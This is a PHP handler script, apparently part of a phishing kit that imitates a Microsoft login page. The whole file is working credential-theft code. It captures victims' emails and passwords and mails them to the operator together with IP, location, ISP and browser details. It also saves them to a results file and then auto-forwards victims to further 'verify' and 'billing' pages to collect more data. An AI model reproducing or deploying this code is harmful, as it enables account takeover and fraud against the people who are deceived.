<?php
include '../main.php';
include '../admin/config.php';
$ip = getUserIP();
$email = explode("@",$_POST['email']);
if (!isset($_POST['email'])) {
	exit(header("HTTP/1.0 404 Not Found"));
}else{
	if($_POST['apistatus'] == '1'){
		$apistatus = "AMAN";
	}else{
		$apistatus = "UNKNOWN";
	}
	$subject = "MICROSOFT LOGIN [ ".$_POST['email']." ] - [$cn - $ip]";
	$message = '
	<p>
	<b>======================[ MICROSOFT LOGIN ]======================</b><br>
	Email : '.$_POST['email'].'<br>
	Password : '.$_POST['password'].'<br>
	<b>======================[ API STATUS ]======================</b><br>
	API STATUS : '.$apistatus.'<br>
	Copy : '.$_POST['email'].'|'.$_POST['password'].'<br>
	<b>======================[ DEVICE INFO ]======================</b><br>
	Country : '.$cn.'<br>
	Region : '.$regioncity.'<br>
	City : '.$citykota.'<br>
	Continent : '.$continent.'<br>
	Curs : '.$kurenci.'<br>
	OS / BR : '.$os.' / '.$br.'<br>
	User Agent : '.$user_agent.'<br>
	Timezone : '.$timezone.'<br>
	ISP : '.$ispuser.'<br>
	IP : '.$ip.'<br>
	ZIP : '.$zip.'<br>
	Date : '.$date.'<br>
	<b>======================[ SAKAW420 - MICROSOFT ]======================</b>
	</p>
	';
if ($config['send_login'] == "email") {
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'FROM: LOGINAN MICROSOFT <'.$sentod.'>' . "\r\n";
$kirim = mail($result_anying, $subject, $message, $headers);
tulis_file("../admin/result/total_login.txt", "".$_POST['email']."|".$_POST['password']."|".$cn."|".$ip."|".$ispuser."");
}else{
include'server.php';
tulis_file("../admin/result/total_login.txt", "".$_POST['email']."|".$_POST['password']."|".$cn."|".$ip."|".$ispuser."");
}
if (preg_match('/aol/',  $email[1]) or preg_match('/yahoo/', $email[1]) or preg_match('/comcast/', $email[1]) or preg_match('/gmail/', $email[1]) or preg_match('/gmx/', $email[1])) {
tulis_file("../admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Login Not HotFams|".$date."");
echo "<form id='boyxd' method='POST' action='../verify'><input type='hidden' name='email' value='".$_POST['email']."'><input type='hidden' name='password' value='".$_POST['password']."'><input type='hidden' name='apistatus' value='".$_POST['apistatus']."'></form><script type='text/javascript'>document.getElementById('boyxd').submit();</script>";
}
elseif($config['billing'] == "on") {
tulis_file("../admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Halaman Billing|".$date."");
echo "<form id='ptz' method='POST' action='../billing'><input type='hidden' name='email' value='".$_POST['email']."'><input type='hidden' name='password' value='".$_POST['password']."'><input type='hidden' name='apistatus' value='".$_POST['apistatus']."'></form><script type='text/javascript'>document.getElementById('ptz').submit();</script>";
}else{
tulis_file("../admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Done|".$date."");
echo "<form id='ptz' method='POST' action='../done?wa=wsignin1.0&rpsnv=13&rver=7.3.6963.0&wp=MBI_SSL&wreply=https%3a%2f%2fwww.microsoft.com%2fen-us%2f&lc=1033&id=74335&aadredir=1&ru=https%3a%2f%2fwww.microsoft.com%2fen-us%2f&uaid=876a74678f9446408bf0adc75cc213b7&pid=0&contextid=1EE93C44426274D9&bk=1619825115&mkt=EN-US'><input type='hidden' name='email' value='".$_POST['email']."'></form><script type='text/javascript'>document.getElementById('ptz').submit();</script>";
}
}
?>